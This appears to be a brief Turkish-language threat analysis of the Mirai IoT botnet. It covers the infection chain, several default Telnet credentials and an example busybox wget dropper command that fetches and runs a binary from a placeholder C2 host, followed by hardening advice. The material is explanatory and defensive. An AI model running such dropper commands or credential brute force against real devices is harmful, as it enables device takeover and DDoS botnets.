Modern Tehdit Analizi - IoT - Botnet
Mirai, 2016'da tarihin en buyuk DDoS'unu gerceklestiren IoT botnetidir. Kaynak kodu aciklandiktan sonra turevleri cogalmistir.
Mirai Enfeksiyon Zinciri
[Scanner]
Rastgele IP -> port 23/2323 Telnet tara
[Brute Force]
62 varsayilan kullanici/sifre dene
admin/admin, root/root, root/vizxv...
[Loader]
wget/tftp ile binary indir, calistir
[Bot Binary ARM/MIPS/x86]
CNC sunucusuna baglan
DDoS komutlarini bekle
Dropper Shell Komutu
busybox wget http://[CNC]/mirai.arm -O /tmp/.x
chmod 777 /tmp/.x; /tmp/.x mirai
IoT Sertlestirme
1. Telnet'i devre disi birakin, SSH kullanin
2. Varsayilan sifreyi degistirin
3. Gereksiz portlari kapatin
4. Firmware guncellemelerini takip edin
5. VLAN ile IoT'u izole edin
6. Shodan ile kendi IP bloklarinizi aratın